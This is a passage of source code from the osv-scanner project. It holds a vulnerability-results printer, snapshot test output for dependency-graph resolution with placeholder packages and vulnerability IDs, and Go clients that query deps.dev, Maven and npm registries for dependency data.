*models.VulnerabilityResults) error { if len(vulnResult.Results) == 0 && vulnResult.LicenseSummary == nil && !cmdlogger.HasErrored() { fmt.Fprintf(r.writer, "No issues found\n") return nil } if r.terminalWidth <= 0 { text.DisableColors() } output.PrintVerticalResults(vulnResult, r.writer, r.showAllVulns) return nil } ================================================ FILE: internal/resolution/__snapshots__/resolve_test.snap ================================================ [TestResolve/complex - 1] complex 9.9.9 ├─ reg|KnownAs="chuck"|Selector="" | alice@^1.0.0 1.0.1 │ └─ $1@^2.0.0 ├─ 1: reg|Selector="" | bob@2.2.2 2.2.2 └─ reg|Selector="" | dave@~3.3.3 3.3.3 ├─ $1@^2.2.2 └─ reg|KnownAs="duck"|Selector="" | chuck@^2.0.0 2.0.0 └─ $1@^2.0.1 --- [TestResolve/complex - 2] [ { "ID": "CMPLX-0000-0000", "DevOnly": false, "Subgraphs": [ { "Dependency": 1, "Nodes": { "0": { "Version": { "System": 3, "Name": "complex", "VersionType": 1, "Version": "9.9.9" }, "Distance": 1, "Parents": null, "Children": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "alice", "VersionType": 1, "Version": "1.0.1" }, "Distance": 0, "Parents": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ], "Children": null } } } ] }, { "ID": "CMPLX-1000-0000", "DevOnly": false, "Subgraphs": [ { "Dependency": 2, "Nodes": { "0": { "Version": { "System": 3, "Name": "complex", "VersionType": 1, "Version": "9.9.9" }, "Distance": 1, "Parents": null, "Children": [ { "From": 0, "To": 2, "Requirement": "2.2.2", "Type": {} }, { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} }, { "From": 0, "To": 3, "Requirement": "~3.3.3", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "alice", "VersionType": 1, "Version": "1.0.1" }, "Distance": 1, "Parents": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ], "Children": [ { "From": 1, "To": 2, "Requirement": "^2.0.0", "Type": {} } ] }, "2": { "Version": { "System": 3, "Name": "bob", "VersionType": 1, "Version": "2.2.2" }, "Distance": 0, "Parents": [ { "From": 0, "To": 2, "Requirement": "2.2.2", "Type": {} }, { "From": 1, "To": 2, "Requirement": "^2.0.0", "Type": {} }, { "From": 3, "To": 2, "Requirement": "^2.2.2", "Type": {} }, { "From": 4, "To": 2, "Requirement": "^2.0.1", "Type": {} } ], "Children": null }, "3": { "Version": { "System": 3, "Name": "dave", "VersionType": 1, "Version": "3.3.3" }, "Distance": 1, "Parents": [ { "From": 0, "To": 3, "Requirement": "~3.3.3", "Type": {} } ], "Children": [ { "From": 3, "To": 2, "Requirement": "^2.2.2", "Type": {} }, { "From": 3, "To": 4, "Requirement": "^2.0.0", "Type": {} } ] }, "4": { "Version": { "System": 3, "Name": "chuck", "VersionType": 1, "Version": "2.0.0" }, "Distance": 1, "Parents": [ { "From": 3, "To": 4, "Requirement": "^2.0.0", "Type": {} } ], "Children": [ { "From": 4, "To": 2, "Requirement": "^2.0.1", "Type": {} } ] } } } ] }, { "ID": "CMPLX-2000-0000", "DevOnly": true, "Subgraphs": [ { "Dependency": 4, "Nodes": { "0": { "Version": { "System": 3, "Name": "complex", "VersionType": 1, "Version": "9.9.9" }, "Distance": 2, "Parents": null, "Children": [ { "From": 0, "To": 3, "Requirement": "~3.3.3", "Type": {} } ] }, "3": { "Version": { "System": 3, "Name": "dave", "VersionType": 1, "Version": "3.3.3" }, "Distance": 1, "Parents": [ { "From": 0, "To": 3, "Requirement": "~3.3.3", "Type": {} } ], "Children": [ { "From": 3, "To": 4, "Requirement": "^2.0.0", "Type": {} } ] }, "4": { "Version": { "System": 3, "Name": "chuck", "VersionType": 1, "Version": "2.0.0" }, "Distance": 0, "Parents": [ { "From": 3, "To": 4, "Requirement": "^2.0.0", "Type": {} } ], "Children": null } } } ] } ] --- [TestResolve/diamond - 1] diamond 1.0.0 ├─ reg|Selector="" | pkg@^1.0.0 1.0.0 │ └─ 1: reg|Selector="" | bad@^1.0.0 1.1.1 └─ reg|Selector="" | dep-one@^1.0.0 1.0.0 ├─ $1@^1.0.0 └─ reg|Selector="" | dep-two@^1.0.0 1.0.0 └─ $1@^1.0.0 --- [TestResolve/diamond - 2] [ { "ID": "DIA-000-000", "DevOnly": false, "Subgraphs": [ { "Dependency": 3, "Nodes": { "0": { "Version": { "System": 3, "Name": "diamond", "VersionType": 1, "Version": "1.0.0" }, "Distance": 2, "Parents": null, "Children": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} }, { "From": 0, "To": 2, "Requirement": "^1.0.0", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "pkg", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ], "Children": [ { "From": 1, "To": 3, "Requirement": "^1.0.0", "Type": {} } ] }, "2": { "Version": { "System": 3, "Name": "dep-one", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 2, "Requirement": "^1.0.0", "Type": {} } ], "Children": [ { "From": 2, "To": 3, "Requirement": "^1.0.0", "Type": {} }, { "From": 2, "To": 4, "Requirement": "^1.0.0", "Type": {} } ] }, "3": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "1.1.1" }, "Distance": 0, "Parents": [ { "From": 1, "To": 3, "Requirement": "^1.0.0", "Type": {} }, { "From": 2, "To": 3, "Requirement": "^1.0.0", "Type": {} }, { "From": 4, "To": 3, "Requirement": "^1.0.0", "Type": {} } ], "Children": null }, "4": { "Version": { "System": 3, "Name": "dep-two", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": [ { "From": 2, "To": 4, "Requirement": "^1.0.0", "Type": {} } ], "Children": [ { "From": 4, "To": 3, "Requirement": "^1.0.0", "Type": {} } ] } } } ] } ] --- [TestResolve/different-pkgs - 1] different-pkgs 3.0.0 ├─ reg|Selector="" | bad2@^1.0.0 1.0.0 └─ reg|Selector="" | dependency@^1.0.0 1.0.0 └─ reg|Selector="" | bad@^1.0.0 1.1.1 --- [TestResolve/different-pkgs - 2] [ { "ID": "OSV-000-000", "DevOnly": false, "Subgraphs": [ { "Dependency": 3, "Nodes": { "0": { "Version": { "System": 3, "Name": "different-pkgs", "VersionType": 1, "Version": "3.0.0" }, "Distance": 2, "Parents": null, "Children": [ { "From": 0, "To": 2, "Requirement": "^1.0.0", "Type": {} } ] }, "2": { "Version": { "System": 3, "Name": "dependency", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 2, "Requirement": "^1.0.0", "Type": {} } ], "Children": [ { "From": 2, "To": 3, "Requirement": "^1.0.0", "Type": {} } ] }, "3": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "1.1.1" }, "Distance": 0, "Parents": [ { "From": 2, "To": 3, "Requirement": "^1.0.0", "Type": {} } ], "Children": null } } } ] }, { "ID": "OSV-000-001", "DevOnly": false, "Subgraphs": [ { "Dependency": 1, "Nodes": { "0": { "Version": { "System": 3, "Name": "different-pkgs", "VersionType": 1, "Version": "3.0.0" }, "Distance": 1, "Parents": null, "Children": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "bad2", "VersionType": 1, "Version": "1.0.0" }, "Distance": 0, "Parents": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ], "Children": null } } }, { "Dependency": 3, "Nodes": { "0": { "Version": { "System": 3, "Name": "different-pkgs", "VersionType": 1, "Version": "3.0.0" }, "Distance": 2, "Parents": null, "Children": [ { "From": 0, "To": 2, "Requirement": "^1.0.0", "Type": {} } ] }, "2": { "Version": { "System": 3, "Name": "dependency", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 2, "Requirement": "^1.0.0", "Type": {} } ], "Children": [ { "From": 2, "To": 3, "Requirement": "^1.0.0", "Type": {} } ] }, "3": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "1.1.1" }, "Distance": 0, "Parents": [ { "From": 2, "To": 3, "Requirement": "^1.0.0", "Type": {} } ], "Children": null } } } ] } ] --- [TestResolve/direct - 1] direct 1.0.0 └─ reg|Selector="" | bad@^2.0.0 2.2.2 --- [TestResolve/direct - 2] [ { "ID": "OSV-000-001", "DevOnly": false, "Subgraphs": [ { "Dependency": 1, "Nodes": { "0": { "Version": { "System": 3, "Name": "direct", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": null, "Children": [ { "From": 0, "To": 1, "Requirement": "^2.0.0", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "2.2.2" }, "Distance": 0, "Parents": [ { "From": 0, "To": 1, "Requirement": "^2.0.0", "Type": {} } ], "Children": null } } } ] } ] --- [TestResolve/duplicates - 1] duplicates 1.1.1 ├─ reg|KnownAs="bad-aliased"|Selector="" | bad@^1.0.0 1.1.1 ├─ reg|Selector="" | dependency@^2.0.0 2.0.0 │ └─ reg|Selector="" | bad@^2.0.0 2.2.2 └─ reg|KnownAs="dependency-v1"|Selector="" | dependency@^1.0.0 1.0.0 └─ reg|Selector="" | bad@^1.0.0 1.1.1 --- [TestResolve/duplicates - 2] [ { "ID": "OSV-000-000", "DevOnly": false, "Subgraphs": [ { "Dependency": 1, "Nodes": { "0": { "Version": { "System": 3, "Name": "duplicates", "VersionType": 1, "Version": "1.1.1" }, "Distance": 1, "Parents": null, "Children": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "1.1.1" }, "Distance": 0, "Parents": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ], "Children": null } } }, { "Dependency": 5, "Nodes": { "0": { "Version": { "System": 3, "Name": "duplicates", "VersionType": 1, "Version": "1.1.1" }, "Distance": 2, "Parents": null, "Children": [ { "From": 0, "To": 3, "Requirement": "^1.0.0", "Type": {} } ] }, "3": { "Version": { "System": 3, "Name": "dependency", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 3, "Requirement": "^1.0.0", "Type": {} } ], "Children": [ { "From": 3, "To": 5, "Requirement": "^1.0.0", "Type": {} } ] }, "5": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "1.1.1" }, "Distance": 0, "Parents": [ { "From": 3, "To": 5, "Requirement": "^1.0.0", "Type": {} } ], "Children": null } } } ] }, { "ID": "OSV-000-001", "DevOnly": false, "Subgraphs": [ { "Dependency": 1, "Nodes": { "0": { "Version": { "System": 3, "Name": "duplicates", "VersionType": 1, "Version": "1.1.1" }, "Distance": 1, "Parents": null, "Children": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "1.1.1" }, "Distance": 0, "Parents": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ], "Children": null } } }, { "Dependency": 4, "Nodes": { "0": { "Version": { "System": 3, "Name": "duplicates", "VersionType": 1, "Version": "1.1.1" }, "Distance": 2, "Parents": null, "Children": [ { "From": 0, "To": 2, "Requirement": "^2.0.0", "Type": {} } ] }, "2": { "Version": { "System": 3, "Name": "dependency", "VersionType": 1, "Version": "2.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 2, "Requirement": "^2.0.0", "Type": {} } ], "Children": [ { "From": 2, "To": 4, "Requirement": "^2.0.0", "Type": {} } ] }, "4": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "2.2.2" }, "Distance": 0, "Parents": [ { "From": 2, "To": 4, "Requirement": "^2.0.0", "Type": {} } ], "Children": null } } }, { "Dependency": 5, "Nodes": { "0": { "Version": { "System": 3, "Name": "duplicates", "VersionType": 1, "Version": "1.1.1" }, "Distance": 2, "Parents": null, "Children": [ { "From": 0, "To": 3, "Requirement": "^1.0.0", "Type": {} } ] }, "3": { "Version": { "System": 3, "Name": "dependency", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 3, "Requirement": "^1.0.0", "Type": {} } ], "Children": [ { "From": 3, "To": 5, "Requirement": "^1.0.0", "Type": {} } ] }, "5": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "1.1.1" }, "Distance": 0, "Parents": [ { "From": 3, "To": 5, "Requirement": "^1.0.0", "Type": {} } ], "Children": null } } } ] } ] --- [TestResolve/existing - 1] existing 1.0.0 └─ opt|Selector="" | dependency@^2.0.0 2.0.0 └─ reg|Selector="" | bad@^2.0.0 2.2.2 --- [TestResolve/existing - 2] [ { "ID": "OSV-000-001", "DevOnly": false, "Subgraphs": [ { "Dependency": 2, "Nodes": { "0": { "Version": { "System": 3, "Name": "existing", "VersionType": 1, "Version": "1.0.0" }, "Distance": 2, "Parents": null, "Children": [ { "From": 0, "To": 1, "Requirement": "^2.0.0", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "dependency", "VersionType": 1, "Version": "2.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 1, "Requirement": "^2.0.0", "Type": {} } ], "Children": [ { "From": 1, "To": 2, "Requirement": "^2.0.0", "Type": {} } ] }, "2": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "2.2.2" }, "Distance": 0, "Parents": [ { "From": 1, "To": 2, "Requirement": "^2.0.0", "Type": {} } ], "Children": null } } } ] } ] --- [TestResolve/non-problem - 1] non-problem 1.0.0 ├─ 1: reg|Selector="" | bad@^1.0.0 1.1.1 └─ reg|Selector="" | dependency@^3.0.0 3.0.0 └─ $1@* --- [TestResolve/non-problem - 2] [ { "ID": "OSV-000-000", "DevOnly": false, "Subgraphs": [ { "Dependency": 1, "Nodes": { "0": { "Version": { "System": 3, "Name": "non-problem", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": null, "Children": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} }, { "From": 0, "To": 2, "Requirement": "^3.0.0", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "1.1.1" }, "Distance": 0, "Parents": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} }, { "From": 2, "To": 1, "Requirement": "*", "Type": {} } ], "Children": null }, "2": { "Version": { "System": 3, "Name": "dependency", "VersionType": 1, "Version": "3.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 2, "Requirement": "^3.0.0", "Type": {} } ], "Children": [ { "From": 2, "To": 1, "Requirement": "*", "Type": {} } ] } } } ] }, { "ID": "OSV-000-001", "DevOnly": false, "Subgraphs": [ { "Dependency": 1, "Nodes": { "0": { "Version": { "System": 3, "Name": "non-problem", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": null, "Children": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} }, { "From": 0, "To": 2, "Requirement": "^3.0.0", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "1.1.1" }, "Distance": 0, "Parents": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} }, { "From": 2, "To": 1, "Requirement": "*", "Type": {} } ], "Children": null }, "2": { "Version": { "System": 3, "Name": "dependency", "VersionType": 1, "Version": "3.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 2, "Requirement": "^3.0.0", "Type": {} } ], "Children": [ { "From": 2, "To": 1, "Requirement": "*", "Type": {} } ] } } } ] } ] --- [TestResolve/simple - 1] simple 1.0.0 └─ reg|Selector="" | dependency@^1.0.0 1.0.0 └─ reg|Selector="" | bad@^1.0.0 1.1.1 --- [TestResolve/simple - 2] [ { "ID": "OSV-000-000", "DevOnly": true, "Subgraphs": [ { "Dependency": 2, "Nodes": { "0": { "Version": { "System": 3, "Name": "simple", "VersionType": 1, "Version": "1.0.0" }, "Distance": 2, "Parents": null, "Children": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "dependency", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ], "Children": [ { "From": 1, "To": 2, "Requirement": "^1.0.0", "Type": {} } ] }, "2": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "1.1.1" }, "Distance": 0, "Parents": [ { "From": 1, "To": 2, "Requirement": "^1.0.0", "Type": {} } ], "Children": null } } } ] }, { "ID": "OSV-000-001", "DevOnly": true, "Subgraphs": [ { "Dependency": 2, "Nodes": { "0": { "Version": { "System": 3, "Name": "simple", "VersionType": 1, "Version": "1.0.0" }, "Distance": 2, "Parents": null, "Children": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ] }, "1": { "Version": { "System": 3, "Name": "dependency", "VersionType": 1, "Version": "1.0.0" }, "Distance": 1, "Parents": [ { "From": 0, "To": 1, "Requirement": "^1.0.0", "Type": {} } ], "Children": [ { "From": 1, "To": 2, "Requirement": "^1.0.0", "Type": {} } ] }, "2": { "Version": { "System": 3, "Name": "bad", "VersionType": 1, "Version": "1.1.1" }, "Distance": 0, "Parents": [ { "From": 1, "To": 2, "Requirement": "^1.0.0", "Type": {} } ], "Children": null } } } ] } ] --- ================================================ FILE: internal/resolution/client/client.go ================================================ // Package client defines the clients for resolving dependencies for various ecosystems. package client import ( "context" "crypto/x509" pb "deps.dev/api/v3" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "deps.dev/util/semver" "github.com/google/osv-scanner/v2/internal/clients/clientinterfaces" "github.com/google/osv-scanner/v2/internal/depsdev" "github.com/google/osv-scanner/v2/internal/version" "google.golang.org/grpc" "google.golang.org/grpc/credentials" ) type ResolutionClient struct { DependencyClient clientinterfaces.VulnerabilityMatcher } type DependencyClient interface { resolve.Client // WriteCache writes a manifest-specific resolution cache. WriteCache(filepath string) error // LoadCache loads a manifest-specific resolution cache. LoadCache(filepath string) error // AddRegistries adds the specified registries to fetch data. AddRegistries(registries []Registry) error } type Registry any // PreFetch loads cache, then makes and caches likely queries needed for resolving a package with a list of requirements func PreFetch(ctx context.Context, c DependencyClient, requirements []resolve.RequirementVersion, manifestPath string) { // It doesn't matter if loading the cache fails _ = c.LoadCache(manifestPath) certPool, err := x509.SystemCertPool() if err != nil { return } creds := credentials.NewClientTLSFromCert(certPool, "") dialOpts := []grpc.DialOption{ grpc.WithTransportCredentials(creds), grpc.WithUserAgent("osv-scanner/" + version.OSVVersion), } conn, err := grpc.NewClient(depsdev.DepsdevAPI, dialOpts...) if err != nil { return } insights := pb.NewInsightsClient(conn) // Use the deps.dev client to fetch complete dependency graphs of our direct imports for _, im := range requirements { // There are potentially a huge number of management/import dependencies. if im.Type.HasAttr(dep.MavenDependencyOrigin) { continue } var vk resolve.Version var constraint *semver.Constraint // Maven registry client may be slow calling MatchingVersions which makes requests to `maven-metadata.xml`. // We can avoid this by only calling MatchingVersions for non-soft requirements. if im.System == resolve.Maven { if constraint, err = semver.Maven.ParseConstraint(im.Version); err != nil { continue } } if constraint != nil && constraint.IsSimple() { // If the requirement is a simple version, use it as the VersionKey, // so we do not need to call MatchingVersions to get available versions. vk = resolve.Version{ VersionKey: im.VersionKey, } } else { // Get the preferred version of the import requirement vks, err := c.MatchingVersions(ctx, im.VersionKey) if err != nil || len(vks) == 0 { continue } vk = vks[len(vks)-1] } // Make a request for the precomputed dependency tree resp, err := insights.GetDependencies(ctx, &pb.GetDependenciesRequest{ VersionKey: &pb.VersionKey{ System: pb.System(vk.System), Name: vk.Name, Version: vk.Version, }, }) if err != nil { continue } // Send off queries to cache the packages in the dependency tree nodes := resp.GetNodes() for _, node := range nodes { pbvk := node.GetVersionKey() vk := resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.System(pbvk.GetSystem()), Name: pbvk.GetName(), }, Version: pbvk.GetVersion(), VersionType: resolve.Concrete, } // TODO: We might want to limit the number of goroutines this creates. go c.Requirements(ctx, vk) //nolint:errcheck go c.Version(ctx, vk) //nolint:errcheck if vk.System != resolve.Maven { // Avoid making requests to `maven-metadata.xml` go c.Versions(ctx, vk.PackageKey) //nolint:errcheck } } } // don't bother waiting for goroutines to finish. } ================================================ FILE: internal/resolution/client/depsdev_client.go ================================================ package client import ( "encoding/gob" "os" "deps.dev/util/resolve" "github.com/google/osv-scanner/v2/internal/datasource" ) const depsDevCacheExt = ".resolve.deps" // DepsDevClient is a ResolutionClient wrapping the official resolve.APIClient type DepsDevClient struct { resolve.APIClient c *datasource.CachedInsightsClient } func NewDepsDevClient(addr string, userAgent string) (*DepsDevClient, error) { c, err := datasource.NewCachedInsightsClient(addr, userAgent) if err != nil { return nil, err } return &DepsDevClient{APIClient: *resolve.NewAPIClient(c), c: c}, nil } func (d *DepsDevClient) AddRegistries(_ []Registry) error { return nil } func (d *DepsDevClient) WriteCache(path string) error { f, err := os.Create(path + depsDevCacheExt) if err != nil { return err } defer f.Close() return gob.NewEncoder(f).Encode(d.c) } func (d *DepsDevClient) LoadCache(path string) error { f, err := os.Open(path + depsDevCacheExt) if err != nil { return err } defer f.Close() return gob.NewDecoder(f).Decode(&d.c) } ================================================ FILE: internal/resolution/client/helper.go ================================================ package client import ( "deps.dev/util/resolve" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scanner/v2/internal/resolution/util" ) // GraphToInventory is a helper function to convert a Graph into an Package for use with VulnerabilityMatcher. func GraphToInventory(g *resolve.Graph) []*extractor.Package { // g.Nodes[0] is the root node of the graph that should be excluded. inv := make([]*extractor.Package, len(g.Nodes)-1) for i, n := range g.Nodes[1:] { inv[i] = &extractor.Package{ Name: n.Version.Name, Version: n.Version.Version, PURLType: util.PURLType[n.Version.System], } } return inv } ================================================ FILE: internal/resolution/client/maven_registry_client.go ================================================ package client import ( "context" "encoding/gob" "errors" "fmt" "os" "strings" "deps.dev/util/maven" "deps.dev/util/resolve" "deps.dev/util/resolve/version" "github.com/google/osv-scanner/v2/internal/datasource" mavenutil "github.com/google/osv-scanner/v2/internal/utility/maven" ) const mavenRegistryCacheExt = ".resolve.maven" type MavenRegistryClient struct { api *datasource.MavenRegistryAPIClient } func NewMavenRegistryClient(registry string) (*MavenRegistryClient, error) { client, err := datasource.NewMavenRegistryAPIClient(datasource.MavenRegistry{URL: registry, ReleasesEnabled: true}) if err != nil { return nil, err } return &MavenRegistryClient{api: client}, nil } func (c *MavenRegistryClient) Version(ctx context.Context, vk resolve.VersionKey) (resolve.Version, error) { g, a, found := strings.Cut(vk.Name, ":") if !found { return resolve.Version{}, fmt.Errorf("invalid Maven package name %s", vk.Name) } proj, err := c.api.GetProject(ctx, g, a, vk.Version) if err != nil { return resolve.Version{}, err } regs := make([]string, len(proj.Repositories)) // Repositories are served as dependency registries. // https://github.com/google/deps.dev/blob/main/util/resolve/api.go#L106 for i, repo := range proj.Repositories { regs[i] = "dep:" + string(repo.URL) } var attr version.AttrSet if len(regs) > 0 { attr.SetAttr(version.Registries, strings.Join(regs, "|")) } return resolve.Version{VersionKey: vk, AttrSet: attr}, nil } // Versions returns all available versions of the given package from the maven-metadata.xml file // // TODO: we should also include versions not listed in the metadata file // There exist versions in the repository but not listed in the metada file, // for example version 20030203.000550 of package commons-io:commons-io // https://repo1.maven.org/maven2/commons-io/commons-io/20030203.000550/. // A package may depend on such version if a soft requirement of this version // is declared. // We need to find out if there are such versions and include them in the // returned versions. func (c *MavenRegistryClient) Versions(ctx context.Context, pk resolve.PackageKey) ([]resolve.Version, error) { if pk.System != resolve.Maven { return nil, fmt.Errorf("wrong system: %v", pk.System) } g, a, found := strings.Cut(pk.Name, ":") if !found { return nil, fmt.Errorf("invalid Maven package name %s", pk.Name) } versions, err := c.api.GetVersions(ctx, g, a) if err != nil { return nil, err } vks := make([]resolve.Version, len(versions)) for i, v := range versions { vks[i] = resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: pk, Version: string(v), VersionType: resolve.Concrete, }} } return vks, nil } func (c *MavenRegistryClient) Requirements(ctx context.Context, vk resolve.VersionKey) ([]resolve.RequirementVersion, error) { if vk.System != resolve.Maven { return nil, fmt.Errorf("wrong system: %v", vk.System) } g, a, found := strings.Cut(vk.Name, ":") if !found { return nil, fmt.Errorf("invalid Maven package name %s", vk.Name) } proj, err := c.api.GetProject(ctx, g, a, vk.Version) if err != nil { return nil, err } // Only merge default profiles by passing empty JDK and OS information. if err := proj.MergeProfiles("", maven.ActivationOS{}); err != nil { return nil, err } // We should not add registries defined in dependencies pom.xml files. apiWithoutRegistries := c.api.WithoutRegistries() // We need to merge parents for potential dependencies in parents. if err := mavenutil.MergeParents(ctx, apiWithoutRegistries, &proj, proj.Parent, 1, "", false); err != nil { return nil, err } proj.ProcessDependencies(func(groupID, artifactID, version maven.String) (maven.DependencyManagement, error) { return mavenutil.GetDependencyManagement(ctx, apiWithoutRegistries, groupID, artifactID, version) }) reqs := make([]resolve.RequirementVersion, 0, len(proj.Dependencies)) for _, d := range proj.Dependencies { reqs = append(reqs, resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: d.Name(), }, VersionType: resolve.Requirement, Version: string(d.Version), }, Type: resolve.MavenDepType(d, ""), }) } return reqs, nil } func (c *MavenRegistryClient) MatchingVersions(ctx context.Context, vk resolve.VersionKey) ([]resolve.Version, error) { if vk.System != resolve.Maven { return nil, fmt.Errorf("wrong system: %v", vk.System) } versions, err := c.Versions(ctx, vk.PackageKey) if err != nil { return nil, err } return resolve.MatchRequirement(vk, versions), nil } func (c *MavenRegistryClient) AddRegistries(registries []Registry) error { for _, reg := range registries { specific, ok := reg.(datasource.MavenRegistry) if !ok { return errors.New("invalid Maven registry information") } if err := c.api.AddRegistry(specific); err != nil { return err } } return nil } func (c *MavenRegistryClient) WriteCache(path string) error { f, err := os.Create(path + mavenRegistryCacheExt) if err != nil { return err } defer f.Close() return gob.NewEncoder(f).Encode(c.api) } func (c *MavenRegistryClient) LoadCache(path string) error { f, err := os.Open(path + mavenRegistryCacheExt) if err != nil { return err } defer f.Close() return gob.NewDecoder(f).Decode(&c.api) } ================================================ FILE: internal/resolution/client/npm_registry_client.go ================================================ package client import ( "context" "crypto/x509" "encoding/gob" "fmt" "os" "slices" "strings" pb "deps.dev/api/v3" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "deps.dev/util/semver" "github.com/google/osv-scanner/v2/internal/datasource" "github.com/google/osv-scanner/v2/internal/depsdev" "github.com/google/osv-scanner/v2/internal/version" "google.golang.org/grpc" "google.golang.org/grpc/credentials" ) const npmRegistryCacheExt = ".resolve.npm" type NpmRegistryClient struct { api *datasource.NpmRegistryAPIClient // Fallback client for dealing with bundleDependencies. ic pb.InsightsClient fallback *resolve.APIClient } func NewNpmRegistryClient(workdir string) (*NpmRegistryClient, error) { api, err := datasource.NewNpmRegistryAPIClient(workdir) if err != nil { return nil, err } certPool, err := x509.SystemCertPool() if err != nil { return nil, fmt.Errorf("getting system cert pool: %w", err) } creds := credentials.NewClientTLSFromCert(certPool, "") dialOpts := []grpc.DialOption{ grpc.WithTransportCredentials(creds), grpc.WithUserAgent("osv-scanner_fix/" + version.OSVVersion), } conn, err := grpc.NewClient(depsdev.DepsdevAPI, dialOpts...) if err != nil { return nil, fmt.Errorf("dialling %q: %w", depsdev.DepsdevAPI, err) } ic := pb.NewInsightsClient(conn) return &NpmRegistryClient{ api: api, ic: ic, fallback: resolve.NewAPIClient(ic), }, nil } func (c *NpmRegistryClient) Version(ctx context.Context, vk resolve.VersionKey) (resolve.Version, error) { if isNpmBundle(vk.PackageKey) { // bundled dependencies, fallback to deps.dev client return c.fallback.Version(ctx, vk) } return resolve.Version{VersionKey: vk}, nil } func (c *NpmRegistryClient) Versions(ctx context.Context, pk resolve.PackageKey) ([]resolve.Version, error) { if isNpmBundle(pk) { // bundled dependencies, fallback to deps.dev client return c.fallback.Versions(ctx, pk) } vers, err := c.api.Versions(ctx, pk.Name) if err != nil { return nil, err } vks := make([]resolve.Version, len(vers.Versions)) for i, v := range vers.Versions { vks[i] = resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: pk, Version: v, VersionType: resolve.Concrete, }} } slices.SortFunc(vks, func(a, b resolve.Version) int { return semver.NPM.Compare(a.Version, b.Version) }) return vks, nil } func (c *NpmRegistryClient) Requirements(ctx context.Context, vk resolve.VersionKey) ([]resolve.RequirementVersion, error) { if vk.System != resolve.NPM { return nil, fmt.Errorf("unsupported system: %v", vk.System) } if isNpmBundle(vk.PackageKey) { // bundled dependencies, fallback to deps.dev client return c.fallback.Requirements(ctx, vk) } dependencies, err := c.api.Dependencies(ctx, vk.Name, vk.Version) if err != nil { return nil, err } // Preallocate the dependency slice, which will hold all the dependencies of each type. // The npm resolver expects bundled dependencies included twice in different forms: // {foo@*|Scope="bundle"} and {mangled-name-of>0.1.2>foo@1.2.3}, hence the 2*len(bundled) depCount := len(dependencies.Dependencies) + len(dependencies.DevDependencies) + len(dependencies.OptionalDependencies) + len(dependencies.PeerDependencies) + 2*len(dependencies.BundleDependencies) deps := make([]resolve.RequirementVersion, 0, depCount) addDeps := func(ds map[string]string, t dep.Type) { for name, req := range ds { typ := t.Clone() if r, ok := strings.CutPrefix(req, "npm:"); ok { // This dependency is aliased, add it as a // dependency on the actual name, with the // KnownAs attribute set to the alias. typ.AddAttr(dep.KnownAs, name) name = r req = "" if i := strings.LastIndex(r, "@"); i > 0 { name = r[:i] req = r[i+1:] } 